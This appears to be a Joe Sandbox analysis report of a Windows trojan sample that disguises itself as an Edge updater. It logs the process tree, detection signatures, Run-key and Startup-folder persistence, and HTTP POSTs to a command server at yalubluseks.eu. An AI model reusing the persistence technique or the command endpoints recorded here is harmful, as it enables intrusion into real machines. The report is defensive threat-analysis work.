Edit tour

Windows Analysis Report
Yc9hcFC1ux.exe

Overview

General Information

Sample name:	Yc9hcFC1ux.exe renamed because original name is a hash value
Original sample name:	0e926b28fc49f6259a70c032ae83cd14.exe
Analysis ID:	1531528
MD5:	0e926b28fc49f6259a70c032ae83cd14
SHA1:	abb5856b3853cfe4ecc5e25ff1a7aa605afac007
SHA256:	3088b0302d4b38c63ef4fead57aa6049da2cc62bf9f4a5d9331552c84fe516e6
Tags:	32exetrojan
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Creates multiple autostart registry keys

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: New RUN Key Pointing to Suspicious Folder

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Yc9hcFC1ux.exe (PID: 2244 cmdline: "C:\Users\user\Desktop\Yc9hcFC1ux.exe" MD5: 0E926B28FC49F6259A70C032AE83CD14)

UUSIService.exe (PID: 4152 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe" MD5: 0E926B28FC49F6259A70C032AE83CD14)

EdgeUpdaters.exe (PID: 5092 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe" --checker MD5: 0E926B28FC49F6259A70C032AE83CD14)

UUSIService.exe (PID: 7132 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe" MD5: 0E926B28FC49F6259A70C032AE83CD14)

WerFault.exe (PID: 5076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 964 MD5: C31336C1EFC2CCB44B4326EA793040F2)

UUSIService.exe (PID: 7104 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe" MD5: 0E926B28FC49F6259A70C032AE83CD14)

WerFault.exe (PID: 2688 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7104 -s 956 MD5: C31336C1EFC2CCB44B4326EA793040F2)

UUSIService.exe (PID: 4560 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe" MD5: 0E926B28FC49F6259A70C032AE83CD14)

WerFault.exe (PID: 1444 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 948 MD5: C31336C1EFC2CCB44B4326EA793040F2)

UUSIService.exe (PID: 1052 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe" MD5: 0E926B28FC49F6259A70C032AE83CD14)

WerFault.exe (PID: 5936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1052 -s 948 MD5: C31336C1EFC2CCB44B4326EA793040F2)

UUSIService.exe (PID: 1948 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe" MD5: 0E926B28FC49F6259A70C032AE83CD14)

WerFault.exe (PID: 6764 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 948 MD5: C31336C1EFC2CCB44B4326EA793040F2)

UUSIService.exe (PID: 4208 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe" MD5: 0E926B28FC49F6259A70C032AE83CD14)

WerFault.exe (PID: 3516 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 948 MD5: C31336C1EFC2CCB44B4326EA793040F2)

UUSIService.exe (PID: 6416 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe" MD5: 0E926B28FC49F6259A70C032AE83CD14)

WerFault.exe (PID: 4560 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6416 -s 948 MD5: C31336C1EFC2CCB44B4326EA793040F2)

UUSIService.exe (PID: 6476 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe" MD5: 0E926B28FC49F6259A70C032AE83CD14)

WerFault.exe (PID: 6816 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 948 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Yc9hcFC1ux.exe, ProcessId: 2244, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_b77d1557f2cc432ca516c465fca16d3a

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Yc9hcFC1ux.exe, ProcessId: 2244, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_b77d1557f2cc432ca516c465fca16d3a

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Yc9hcFC1ux.exe, ProcessId: 2244, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_9cd4d46bd3c344a5a3b57427edc04e3a.lnk

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-11T10:17:47.071327+0200	2803305	3	Unknown Traffic	192.168.2.6	49711	172.67.74.152	80	TCP
2024-10-11T10:19:15.087037+0200	2803305	3	Unknown Traffic	192.168.2.6	49997	172.67.74.152	80	TCP
2024-10-11T10:19:16.384852+0200	2803305	3	Unknown Traffic	192.168.2.6	49999	172.67.74.152	80	TCP
2024-10-11T10:19:18.794632+0200	2803305	3	Unknown Traffic	192.168.2.6	50001	172.67.74.152	80	TCP
2024-10-11T10:19:20.227669+0200	2803305	3	Unknown Traffic	192.168.2.6	50003	172.67.74.152	80	TCP
2024-10-11T10:19:51.090470+0200	2803305	3	Unknown Traffic	192.168.2.6	50003	172.67.74.152	80	TCP
2024-10-11T10:19:52.040269+0200	2803305	3	Unknown Traffic	192.168.2.6	50003	172.67.74.152	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for domain / URL

Source: yalubluseks.eu

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	ReversingLabs: Detection: 64%

Multi AV Scanner detection for submitted file

Source: Yc9hcFC1ux.exe	ReversingLabs: Detection: 64%
Source: Yc9hcFC1ux.exe	Virustotal: Detection: 68%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Yc9hcFC1ux.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:50005 version: TLS 1.2

Source: Yc9hcFC1ux.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb$a source: UUSIService.exe, 00000010.00000002.2560152029.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: UUSIService.exe, 00000010.00000002.2560152029.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HP<o0C:\Windows\mscorlib.pdb source: UUSIService.exe, 00000013.00000002.2639029055.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2931976658.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: UUSIService.exe, 00000004.00000002.2276579971.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000000B.00000002.2346068111.0000000002514000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2561765688.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000013.00000002.2640710341.0000000002681000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2851372225.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2938414169.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3155373385.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001F.00000002.3227457110.0000000002811000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb< source: WERC536.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb7 source: UUSIService.exe, 00000013.00000002.2639309905.0000000000917000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbSystem.ni.dll source: WERC536.tmp.dmp.18.dr
Source:	Binary string: 00000000000000000400000000000000e.pdbs source: UUSIService.exe, 0000000B.00000002.2345222337.000000000066D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rlib.pdbE source: UUSIService.exe, 0000001C.00000002.3154542106.0000000001070000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: orlib.pdb"J1 source: UUSIService.exe, 00000013.00000002.2639309905.0000000000917000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbh source: WERC536.tmp.dmp.18.dr
Source:	Binary string: b77a5c561934e089\mscorlib.pdb source: UUSIService.exe, 0000001F.00000002.3226748776.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbff source: UUSIService.exe, 00000010.00000002.2560152029.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb`}e0* source: WER7001.tmp.dmp.13.dr
Source:	Binary string: 00000000000000000400000000000000e.pdbp source: UUSIService.exe, 0000001C.00000002.3154542106.000000000103D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.PDBem.Con0 source: UUSIService.exe, 00000010.00000002.2560152029.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: UUSIService.exe, 00000004.00000002.2275959842.0000000001096000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 0000000B.00000002.2345222337.00000000006AB000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2560152029.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: indows\mscorlib.pdb source: UUSIService.exe, 00000004.00000002.2275816156.0000000000D88000.00000004.00000010.00020000.00000000.sdmp, UUSIService.exe, 0000000B.00000002.2345000662.00000000004F8000.00000004.00000010.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2850410204.00000000009C8000.00000004.00000010.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3153688028.0000000000D88000.00000004.00000010.00020000.00000000.sdmp, UUSIService.exe, 0000001F.00000002.3226352952.00000000008F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \mscorlib.pdb source: UUSIService.exe, 00000016.00000002.2850600152.0000000000D16000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rlib.pdb source: UUSIService.exe, 00000004.00000002.2275959842.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2560152029.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2850600152.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3154542106.0000000001070000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: UUSIService.exe, 00000016.00000002.2850600152.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3154542106.0000000001070000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: UUSIService.exe, 00000004.00000002.2276579971.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000000B.00000002.2346068111.0000000002514000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2561765688.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000013.00000002.2640710341.0000000002681000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2851372225.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2938414169.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3155373385.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001F.00000002.3227457110.0000000002811000.00000004.00000800.00020000.00000000.sdmp, WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb, source: UUSIService.exe, 00000013.00000002.2639309905.0000000000917000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.pdb source: UUSIService.exe, 00000019.00000002.2933484966.00000000009C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdb source: WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.PDB source: UUSIService.exe, 0000000B.00000002.2345222337.000000000066D000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2933484966.00000000009C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: SHA161934e089ib.pdbXH source: UUSIService.exe, 00000010.00000002.2560152029.00000000009D5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb00 source: WER56A8.tmp.dmp.27.dr
Source:	Binary string: mscorlib.pdb source: UUSIService.exe, 00000004.00000002.2276579971.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000000B.00000002.2346068111.0000000002514000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2561765688.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000013.00000002.2640710341.0000000002681000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2851372225.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2938414169.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3155373385.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001F.00000002.3227457110.0000000002811000.00000004.00000800.00020000.00000000.sdmp, WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: UUSIService.exe, 00000016.00000002.2850600152.0000000000D16000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbNQ source: UUSIService.exe, 00000019.00000002.2933484966.0000000000A09000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdb source: UUSIService.exe, 00000016.00000002.2850600152.0000000000D16000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.PDB03A source: UUSIService.exe, 0000001C.00000002.3154542106.000000000103D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbC source: UUSIService.exe, 00000019.00000002.2933484966.00000000009C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: UUSIService.exe, 00000004.00000002.2275959842.00000000010CE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: System.Core.pdb source: UUSIService.exe, 00000004.00000002.2276579971.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000000B.00000002.2346068111.0000000002514000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2561765688.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000013.00000002.2640710341.0000000002681000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2851372225.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2938414169.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3155373385.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001F.00000002.3227457110.0000000002811000.00000004.00000800.00020000.00000000.sdmp, WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: rlib.pdbb source: UUSIService.exe, 00000016.00000002.2850600152.0000000000D57000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: orlib.pdb source: UUSIService.exe, 0000000B.00000002.2345222337.000000000066D000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2560152029.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2850600152.0000000000D16000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2933484966.00000000009C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: UUSIService.exe, 00000004.00000002.2276579971.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000000B.00000002.2346068111.0000000002514000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2561765688.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000013.00000002.2640710341.0000000002681000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2851372225.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2938414169.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3155373385.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001F.00000002.3227457110.0000000002811000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 00000000000000000400000000000000e.pdb source: UUSIService.exe, 00000016.00000002.2850600152.0000000000D16000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbDP source: UUSIService.exe, 00000019.00000002.2933484966.0000000000A09000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Jump to behavior

Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: Joe Sandbox View	IP Address: 104.21.54.163 104.21.54.163
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49711 -> 172.67.74.152:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50001 -> 172.67.74.152:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49997 -> 172.67.74.152:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49999 -> 172.67.74.152:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50003 -> 172.67.74.152:80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: yalubluseks.eu

Source: unknown

HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continueConnection: Keep-Alive

Source: UUSIService.exe, 00000002.00000002.3379367451.000000000357C000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000002.00000002.3379367451.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: UUSIService.exe, 00000002.00000002.3379367451.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: UUSIService.exe, 00000002.00000002.3379367451.0000000003509000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgD
Source: UUSIService.exe, 00000002.00000002.3379367451.0000000003509000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgd
Source: UUSIService.exe, 00000002.00000002.3379367451.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgh
